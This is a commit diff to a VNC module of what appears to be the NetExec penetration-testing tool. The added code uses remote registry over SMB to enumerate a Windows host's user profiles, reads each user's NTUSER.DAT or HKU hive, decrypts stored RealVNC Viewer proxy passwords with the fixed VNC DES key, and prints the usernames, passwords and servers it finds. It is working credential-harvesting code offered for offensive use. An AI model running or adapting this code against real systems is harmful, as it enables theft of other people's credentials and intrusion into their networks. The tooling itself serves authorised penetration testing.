update vnc

Author: zblurx

nxc/modules/vnc.py

@@ -1,8 +1,12 @@
+import ntpath
+import tempfile
 from dploot.lib.smb import DPLootSMBConnection
 from dploot.lib.target import Target
 
 from impacket.dcerpc.v5 import rrp
+from impacket import winregistry
 from impacket.examples.secretsdump import RemoteOperations
+from impacket.system_errors import ERROR_NO_MORE_ITEMS
 
 from Cryptodome.Cipher import DES
 from binascii import unhexlify
@@ -74,6 +78,7 @@ def on_admin_login(self, context, connection):
             remote_ops = RemoteOperations(connection.conn, False)
             remote_ops.enableRegistry()
             self.vnc_from_registry(remote_ops)
+            self.vnc_client_proxyconf_extract(dploot_conn, remote_ops)
         self.vnc_from_filesystem(dploot_conn)
 
     def upgrade_connection(self, target: Target, connection=None):
@@ -84,14 +89,9 @@ def upgrade_connection(self, target: Target, connection=None):
             conn.connect()
         return conn
 
-    def reg_query_value(self, remote_ops, path, key):
+    def reg_query_value(self, remote_ops, path, key, hku = False):
         if remote_ops._RemoteOperations__rrp:
-            if path[:4] == "HKCU":
-                path = path[5:]
-                ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
-            elif path[:4] == "HKLM":
-                path = path[5:]
-                ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
+            ans = rrp.hOpenUsers(remote_ops._RemoteOperations__rrp) if hku else rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
             reg_handle = ans["phKey"]
             ans = rrp.hBaseRegOpenKey(
                 remote_ops._RemoteOperations__rrp,
@@ -110,14 +110,53 @@ def reg_query_value(self, remote_ops, path, key):
             except rrp.DCERPCSessionError as e:
                 self.context.log.debug(f"Error while querying registry value for {path} {key}: {e}")
 
+    def vnc_client_proxyconf_extract(self, dploot_conn, remote_ops=None):
+        vnc_client_softwares = [
+            ("RealVNC Viewer 7.x Proxy Conf", "Software\\RealVNC\\vncviewer", ["ProxyUserName", "ProxyPassword", "ProxyServer"]),
+        ]
+        users = self.get_users(remote_ops)
+        for user, sid in users.items():
+            ntuser_dat_path = ntpath.join(f"Users\\{user}\\NTUSER.DAT")
+            try:
+                ntuser_dat_bytes = dploot_conn.readFile(self.share,ntuser_dat_path)
+            except Exception as e:
+                self.context.log.debug(f"Error while getting NTUSER.DAT file for {user}: {e}")
+            for vnc_name, registry_path, registry_keys in vnc_client_softwares:
+                cred = {}
+                if ntuser_dat_bytes is None and remote_ops is not None:
+                    user_registry_path = ntpath.join(sid,registry_path)
+                    try:
+                        password = self.reg_query_value(remote_ops, user_registry_path, registry_keys[1], hku=True).encode().rstrip(b"\x00").decode()
+                        cred["password"] = self.recover_vncpassword(unhexlify(password)).decode("latin-1")
+                        cred["server"] = self.reg_query_value(remote_ops, user_registry_path, registry_keys[2], hku=True)
+                        cred["user"] = self.reg_query_value(remote_ops, user_registry_path, registry_keys[0], hku=True)
+                    except Exception as e:
+                        if "ERROR_FILE_NOT_FOUND" not in str(e):
+                            self.context.log.debug(f"Error while RegQueryValues {registry_keys} from {user_registry_path}: {e}")
+                        continue
+                else:
+                    fh = tempfile.NamedTemporaryFile()
+                    fh.write(ntuser_dat_bytes)
+                    fh.seek(0)
+                    reg = winregistry.Registry(fh.name, isRemote=False)
+                    parent_key = reg.findKey(registry_path)
+                    if parent_key is None:
+                        continue
+                    cred["user"] = reg.getValue(ntpath.join(registry_path,registry_keys[0]))[1].decode("latin-1")
+                    password = reg.getValue(ntpath.join(registry_path,registry_keys[1]))[1].decode("utf-16le").rstrip("\0").encode()
+                    cred["password"] = self.recover_vncpassword(unhexlify(password)).decode("latin-1")
+                    cred["server"] = reg.getValue(ntpath.join(registry_path,registry_keys[2]))[1].decode("latin-1")
+
+                self.context.log.highlight(f"[{vnc_name}] {cred['user']}:{cred['password']}@{cred['server']}")
+
     def vnc_from_registry(self, remote_ops):
         vncs = (
-            ("RealVNC 4.x", "HKLM\\SOFTWARE\\Wow6432Node\\RealVNC\\WinVNC4", "Password"),
-            ("RealVNC 3.x", "HKLM\\SOFTWARE\\RealVNC\\vncserver", "Password"),
-            ("RealVNC 4.x", "HKLM\\SOFTWARE\\RealVNC\\WinVNC4", "Password"),
-            ("TightVNC", "HKLM\\Software\\TightVNC\\Server", "Password"),
-            ("TightVNC ControlPassword", "HKLM\\Software\\TightVNC\\Server", "ControlPassword"),
-            ("TightVNC", "HKLM\\Software\\TightVNC\\Server", "PasswordViewOnly"),
+            ("RealVNC 4.x", "SOFTWARE\\Wow6432Node\\RealVNC\\WinVNC4", "Password"),
+            ("RealVNC 3.x", "SOFTWARE\\RealVNC\\vncserver", "Password"),
+            ("RealVNC 4.x", "SOFTWARE\\RealVNC\\WinVNC4", "Password"),
+            ("TightVNC", "Software\\TightVNC\\Server", "Password"),
+            ("TightVNC ControlPassword", "Software\\TightVNC\\Server", "ControlPassword"),
+            ("TightVNC", "Software\\TightVNC\\Server", "PasswordViewOnly"),
         )
         for vnc_name, path, key in vncs:
             try:
@@ -209,3 +248,38 @@ def vnc_from_filesystem(self, dploot_conn):
                         passwd_encrypted = passwd_encrypted.split(b"=")[-1]
                         password = self.recover_vncpassword(unhexlify(passwd_encrypted))[:8]
                         self.context.log.highlight(f"[{vnc_name}] Password: {password.decode('latin-1')}")
+
+    def get_users(self, conn):
+        users = {}
+        userlist_key = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList"
+
+        ans = rrp.hOpenLocalMachine(conn._RemoteOperations__rrp)
+        regHandle = ans["phKey"]
+
+        ans = rrp.hBaseRegOpenKey(conn._RemoteOperations__rrp, regHandle, userlist_key, samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE)
+        keyHandle = ans["phkResult"]
+
+        sids = []
+
+        i = 0
+        while True:
+            try:
+                ans2 = rrp.hBaseRegEnumKey(conn._RemoteOperations__rrp, keyHandle, i)
+                sids.append(ans2["lpNameOut"])
+            except rrp.DCERPCSessionError as e:
+                if e.get_error_code() == ERROR_NO_MORE_ITEMS:
+                    break
+            except Exception as e:
+                self.context.debug(f"Error while listing users from HKU: {e}")
+            i +=1
+        rrp.hBaseRegCloseKey(conn._RemoteOperations__rrp, keyHandle)
+        for sid in sids:
+            ans = rrp.hBaseRegOpenKey(conn._RemoteOperations__rrp, regHandle, ntpath.join(userlist_key,sid), samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE)
+            keyHandle = ans["phkResult"]
+            _,  profile_path = rrp.hBaseRegQueryValue(conn._RemoteOperations__rrp, keyHandle, "ProfileImagePath")
+            if r"%systemroot%" in profile_path:
+                continue
+            users[ntpath.basename(profile_path.rstrip("\0"))] = sid.rstrip("\0")
+            rrp.hBaseRegCloseKey(conn._RemoteOperations__rrp, keyHandle)
+
+        return users